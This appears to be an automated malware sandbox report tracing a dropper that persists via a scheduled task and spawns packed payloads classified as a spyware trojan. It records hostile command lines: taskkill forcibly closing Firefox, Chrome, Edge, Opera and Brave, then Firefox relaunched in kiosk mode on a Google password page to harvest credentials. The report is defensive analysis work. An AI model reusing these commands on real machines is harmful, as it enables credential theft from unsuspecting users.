                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006DE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_006DE8F6
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A278BB0_2_00A278BB
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A288600_2_00A28860
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A270490_2_00A27049
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A231A80_2_00A231A8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF81D30_2_00AF81D3
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF81010_2_00AF8101
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E4B300_2_009E4B30
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E4DE00_2_009E4DE0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A22D100_2_00A22D10
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A2779B0_2_00A2779B
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A17F360_2_00A17F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AE78BB1_2_00AE78BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AE88601_2_00AE8860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AE70491_2_00AE7049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AE31A81_2_00AE31A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AA4B301_2_00AA4B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AA4DE01_2_00AA4DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AE2D101_2_00AE2D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AE779B1_2_00AE779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AD7F361_2_00AD7F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AE78BB2_2_00AE78BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AE88602_2_00AE8860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AE70492_2_00AE7049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AE31A82_2_00AE31A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AA4B302_2_00AA4B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AA4DE02_2_00AA4DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AE2D102_2_00AE2D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AE779B2_2_00AE779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AD7F362_2_00AD7F36
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AAE5306_2_00AAE530
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AC61926_2_00AC6192
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AE88606_2_00AE8860
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AA4B306_2_00AA4B30
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AA4DE06_2_00AA4DE0
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AE2D106_2_00AE2D10
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AC0E136_2_00AC0E13
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AE70496_2_00AE7049
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AE31A86_2_00AE31A8
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AC16026_2_00AC1602
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AE779B6_2_00AE779B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AE78BB6_2_00AE78BB
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AC3DF16_2_00AC3DF1
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AD7F366_2_00AD7F36
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0067BF4011_2_0067BF40
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0067806011_2_00678060
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E204611_2_006E2046
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006D829811_2_006D8298
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006AE4FF11_2_006AE4FF
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006A676B11_2_006A676B
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0070487311_2_00704873
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0067CAF011_2_0067CAF0
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0069CAA011_2_0069CAA0
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0068CC3911_2_0068CC39
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006A6DD911_2_006A6DD9
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0068D06511_2_0068D065
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0068B11911_2_0068B119
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006791C011_2_006791C0
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0069139411_2_00691394
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0069170611_2_00691706
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0069781B11_2_0069781B
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0068997D11_2_0068997D
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_0067792011_2_00677920
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006919B011_2_006919B0
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_00697A4A11_2_00697A4A
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_00691C7711_2_00691C77
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_00697CA711_2_00697CA7
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006FBE4411_2_006FBE44
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006A9EEE11_2_006A9EEE
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_00691F3211_2_00691F32
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe 1D95373C2284B657B614F07051EED5FED72F34F787350409E49E8DC30A5EA494
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe 9661D8306B9BF658642A01718AC746113E19741A560A48A5583BACD52998AF22
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe 2A68C5304DEEBB741759B134BE32D6C0F8E64DFBB8C06D9765E3035D3AF6CBFD
                          Source: C:\Users\user\Desktop\file.exeCode function: String function: 009F80C0 appears 130 times
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: String function: 00690A30 appears 46 times
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: String function: 0068F9F2 appears 31 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00AB7A00 appears 38 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00ABD64E appears 79 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00ABD663 appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00ABD942 appears 85 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00ABDF80 appears 81 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00AD8E10 appears 47 times
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00AB80C0 appears 393 times
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: random[1].exe.6.drStatic PE information: Section: ZLIB complexity 0.997627865484429
                          Source: random[1].exe.6.drStatic PE information: Section: xyjapqsh ZLIB complexity 0.9942076156859846
                          Source: ae5cfd188c.exe.6.drStatic PE information: Section: ZLIB complexity 0.997627865484429
                          Source: ae5cfd188c.exe.6.drStatic PE information: Section: xyjapqsh ZLIB complexity 0.9942076156859846
                          Source: random[1].exe0.6.drStatic PE information: Section: ipnqzgkg ZLIB complexity 0.9949173823395884
                          Source: 37df924488.exe.6.drStatic PE information: Section: ipnqzgkg ZLIB complexity 0.9949173823395884
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@85/20@28/14
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E37B5 GetLastError,FormatMessageW,11_2_006E37B5
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006D10BF AdjustTokenPrivileges,CloseHandle,11_2_006D10BF
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006D16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_006D16C3
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,11_2_006E51CD
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006DD4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_006DD4DC
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006E648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,11_2_006E648E
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006742A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_006742A2
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3300:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5304:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1700:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: ae5cfd188c.exe, 00000007.00000003.2497427727.0000000005624000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2498097741.0000000005600000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2631430591.0000000005420000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: file.exeReversingLabs: Detection: 55%
                          Source: 37df924488.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: ae5cfd188c.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2272 -parentBuildID 20230927232528 -prefsHandle 2192 -prefMapHandle 2184 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55e86b5f-3953-4278-9a52-23c7c331b436} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba49c6e110 socket
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe"
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe"
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4116 -parentBuildID 20230927232528 -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f1a1788-4a6a-4b44-adb8-7b34c81ea1a2} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba5bd78210 rdd
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1944,i,17281856634279828374,9724014430205040748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,16142706175083674967,2684589522950696221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                          Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
